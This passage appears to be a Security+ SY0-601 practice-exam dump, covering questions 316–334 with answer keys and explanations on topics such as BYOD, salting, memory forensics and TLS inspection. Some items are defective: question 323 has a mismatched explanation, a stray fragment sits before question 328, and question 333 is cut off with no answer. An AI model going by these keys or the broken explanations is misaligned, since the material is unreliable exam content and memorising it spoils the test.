informed decisions about how to mitigate those risks. This is the best reason to maintain an effective
asset management policy.
Reference: CompTIA Security+ Study Guide (SY0-601) 7th Edition by Emmett Dulaney, Chuck Easttom
316.A company wants to enable BYOD for checking email and reviewing documents. Many of the
documents contain sensitive organizational information.
Which of the following should be deployed first before allowing the use of personal devices to access
company data?
A. MDM
B. RFID
C. DLP
D. SIEM
Answer: A
Explanation:
MDM stands for Mobile Device Management, which is a solution that can be used to manage and secure
personal devices that access company data. MDM can enforce policies and rules, such as password
protection, encryption, remote wipe, device lock, application control, and more. MDM can help a
company enable BYOD (Bring Your Own Device) while protecting sensitive organizational information.
317.A company recently upgraded its authentication infrastructure and now has more computing power.
Which of the following should the company consider using to ensure user credentials are being
transmitted and stored more securely?
A. Blockchain
B. Salting
C. Quantum
D. Digital signature
Answer: B
Explanation:
Salting is a technique that adds random data to user credentials before hashing them. This makes the
hashed credentials more secure and resistant to brute-force attacks or rainbow table attacks. Salting
also ensures that two users with the same password will have different hashed credentials.
A company that has more computing power can consider using salting to ensure user credentials are
being transmitted and stored more securely. Salting can increase the complexity and entropy of the
hashed credentials, making them harder to crack or reverse.
318.A digital forensics team at a large company is investigating a case in which malicious code was
downloaded over an HTTPS connection and was running in memory, but was never committed to disk.
Which of the following techniques should the team use to obtain a sample of the malware binary?
A. pcap reassembly
B. SSD snapshot
C. Image volatile memory
D. Extract from checksums
Answer: C
Explanation:
The best technique for the digital forensics team to use to obtain a sample of the malware binary is to
image volatile memory. Volatile memory imaging is a process of collecting a snapshot of the contents of
a computer's RAM, which can include active malware programs. According to the CompTIA Security+
SY0-601 Official Text Book, volatile memory imaging can be used to capture active malware programs
that are running in memory, but have not yet been committed to disk. This technique is especially useful
in cases where the malware is designed to self-destruct or erase itself from the disk after execution.
319.A security administrator installed a new web server. The administrator did this to increase the
capacity for an application due to resource exhaustion on another server.
Which of the following algorithms should the administrator use to split the number of connections on
each server in half?
A. Weighted response
B. Round-robin
C. Least connection
D. Weighted least connection
Answer: B
Explanation:
The administrator should use a round-robin algorithm to split the number of connections on each server
in half. Round-robin is a load-balancing algorithm that distributes incoming requests to the available
servers one by one in a cyclical order. This helps to evenly distribute the load across all of the servers,
ensuring that no single server is overloaded.
320.Which of the following describes business units that purchase and implement scripting software
without approval from an organization's technology support staff?
A. Shadow IT
B. Hacktivist
C. Insider threat
D. Script kiddie
Answer: A
Explanation:
Shadow IT is the use of IT-related hardware or software by a department or individual without the
knowledge or approval of the IT or security group within the organization. Shadow IT can encompass
cloud services, software, and hardware. The main area of concern today is the rapid adoption of cloud-
based services.
According to one source, discovering shadow IT helps you know and identify which apps are being used and what
your risk level is. 80% of employees use non-sanctioned apps that no one has reviewed, and that may not be
compliant with your security and compliance policies.
321.A company that provides an online streaming service made its customers' personal data, including
names and email addresses, publicly available in a cloud storage service. As a result, the company
experienced an increase in the number of requests to delete user accounts.
Which of the following best describes the consequence of this data disclosure?
A. Regulatory fines
B. Reputation damage
C. Increased insurance costs
D. Financial loss
Answer: B
Explanation:
Reputation damage is the loss of trust or credibility that a company suffers when its customers’ personal
data is exposed or breached. This can lead to customer dissatisfaction, loss of loyalty, and requests to
delete user accounts.
References: https://www.comptia.org/content/guides/what-is-cybersecurity
322.A security architect is working on an email solution that will send sensitive data. However, funds are
not currently available in the budget for building additional infrastructure.
Which of the following should the architect choose?
A. POP
B. IPSec
C. IMAP
D. PGP
Answer: D
Explanation:
PGP (Pretty Good Privacy) is a commonly used encryption method for email communications to secure
the sensitive data being sent. It allows for the encryption of the entire message or just the sensitive parts.
It would be an appropriate solution in this case as it doesn't require additional infrastructure to
implement.
323.Which of the following can be used to detect a hacker who is stealing company data over port 80?
A. Web application scan
B. Threat intelligence
C. Log aggregation
D. Packet capture
Answer: D
Explanation:
✑ Using a SIEM tool to monitor network traffic in real-time and detect any anomalies or malicious
activities
✑ Monitoring all network protocols and ports to detect suspicious volumes of traffic or connections to
uncommon IP addresses
✑ Monitoring for outbound traffic patterns that indicate malware communication with command and
control servers, such as beaconing or DNS tunneling
✑ Using a CASB tool to control access to cloud resources and prevent data leaks or downloads
✑ Encrypting data at rest and in transit and enforcing strong authentication and authorization policies
325.A company was recently breached. Part of the company's new cybersecurity strategy is to centralize
the logs from all security devices.
Which of the following components forwards the logs to a central source?
A. Log enrichment
B. Log queue
C. Log parser
D. Log collector
Answer: D
Explanation:
A log collector can collect logs from various sources, such as servers, devices, applications, or network
components, and forward them to a central source for analysis and storage.
326.A systems analyst is responsible for generating a new digital forensics chain-of-custody form.
Which of the following should the analyst include in this documentation? (Select two).
A. The order of volatility
B. A forensics NDA
C. The provenance of the artifacts
D. The vendor's name
E. The date and time
F. A warning banner
Answer: C,E
Explanation:
A digital forensics chain-of-custody form is a document that records the chronological and logical
sequence of custody, control, transfer, analysis, and disposition of digital evidence.
A digital forensics chain-of-custody form should include the following information:
✑ The provenance of the artifacts: The provenance of the artifacts refers to the origin and history of the
digital evidence, such as where, when, how, and by whom it was collected, handled, analyzed, or
otherwise controlled.
✑ The date and time: The date and time refer to the specific moments when the digital evidence was
collected, handled, analyzed, transferred, or disposed of by each person involved in the chain of custody.
Other information that may be included in a digital forensics chain-of-custody form are:
✑ The identification of the artifacts: The identification of the artifacts refers to the unique identifiers or
labels assigned to the digital evidence, such as serial numbers, barcodes, hashes, or descriptions.
✑ The signatures of the custodians: The signatures of the custodians refer to the names and signatures
of each person who had custody or control of the digital evidence at any point in the chain of custody.
✑ The location of the artifacts: The location of the artifacts refers to the physical or logical places where
the digital evidence was stored or processed, such as a lab, a server, a cloud service, or a device.
References:
https://www.comptia.org/certifications/security#examdetails
https://www.comptia.org/content/guides/comptia-security-sy0-601-exam-objectives
https://resources.infosecinstitute.com/topic/chain-of-custody-in-digital-forensics/
information. The attacker may use this information to compromise the WordPress site or the users’
accounts.
328.Which of the following is required in order for an IDS and a WAF to be effective on HTTPS traffic?
A. Hashing
B. DNS sinkhole
C. TLS inspection
D. Data masking
Answer: C
Explanation:
TLS (Transport Layer Security) is a protocol that is used to encrypt data sent over HTTPS (Hypertext
Transfer Protocol Secure). In order for an intrusion detection system (IDS) and a web application firewall
(WAF) to be effective on HTTPS traffic, they must be able to inspect the encrypted traffic. TLS inspection
allows the IDS and WAF to decrypt and inspect the traffic, allowing them to detect any malicious activity.
References:
[1] CompTIA Security+ Study Guide: Exam SY0-601, Sixth Edition, Chapter 11, "Network Security Monitoring"
[2] CompTIA Security+ Get Certified Get Ahead: SY0-501 Study Guide, Chapter 7, "Intrusion Detection and Prevention"
329.A cybersecurity analyst needs to adopt controls to properly track and log user actions to an
individual.
Which of the following should the analyst implement?
A. Non-repudiation
B. Baseline configurations
C. MFA
D. DLP
Answer: A
Explanation:
Non-repudiation is the process of ensuring that a party involved in a transaction or communication
cannot deny their involvement. By implementing non-repudiation controls, a cybersecurity analyst can
properly track and log user actions, attributing them to a specific individual. This can be achieved through
methods such as digital signatures, timestamps, and secure logging mechanisms.
References:
1. CompTIA Security+ Certification Exam Objectives (SY0-601):
https://www.comptia.jp/pdf/CompTIA%20Security%2B%20SY0-601%20Exam%20Objectives.pdf
2. Stewart, J. M., Chapple, M., & Gibson, D. (2021). CompTIA Security+ Study Guide: Exam SY0-601. John Wiley & Sons.
330.A company is enhancing the security of the wireless network and needs to ensure only employees
with a valid certificate can authenticate to the network.
Which of the following should the company implement?
A. PEAP
B. PSK
C. WPA3
D. WPS
Answer: A
Explanation:
PEAP stands for Protected Extensible Authentication Protocol, which is a protocol that can provide
secure authentication for wireless networks. PEAP can use certificates to authenticate the server and the
client, or only the server. PEAP can also use other methods, such as passwords or tokens, to
authenticate the client. PEAP can ensure only employees with a valid certificate can authenticate to the
network.
331.A security analyst is reviewing packet capture data from a compromised host. In the packet
capture, the analyst locates packets that contain large amounts of text.
Which of the following is most likely installed on the compromised host?
A. Keylogger
B. Spyware
C. Trojan
D. Ransomware
Answer: A
Explanation:
A keylogger is a type of malware that records the keystrokes of the user and sends them to a remote
attacker. The attacker can use the keystrokes to steal the user’s credentials, personal information, or
other sensitive data. A keylogger can generate packets that contain large amounts of text, as the packet
capture data shows.
332.Which of the following best describes the situation where a successfully onboarded employee who is
using a fingerprint reader is denied access at the company's main gate?
A. Crossover error rate
B. False match rate
C. False rejection
D. False positive
Answer: C
Explanation:
A false rejection occurs when a biometric system fails to recognize an authorized user and denies
access. This can happen due to poor quality of the biometric sample, environmental factors, or system
errors.
References: https://www.comptia.org/blog/what-is-biometrics
333.A corporate security team needs to secure the wireless perimeter of its physical facilities to ensure
only authorized users can access corporate resources.
Which of the following should the security team do? (Refer the answer from CompTIA SY0-601 Security+
documents or guide at comptia.org)
A. Identify rogue access points.
B. Check for channel overlaps.
334.A security administrator needs to add fault tolerance and load balancing to the connection from the
file server to the backup storage.
Which of the following is the best choice to achieve this objective?
A. Multipathing
B. RAID
C. Segmentation
D. 8021.1
Answer: A
Explanation:
The best choice to achieve the objective of adding fault tolerance and load balancing to the connection from the file
server to the backup storage is multipathing. Multipathing is a technique that allows a system to use
more than one path to access a storage device. This can improve performance by distributing the
workload across multiple paths, and also provide fault tolerance by switching to an alternative path if one
path fails. Multipathing can be implemented using software or hardware solutions.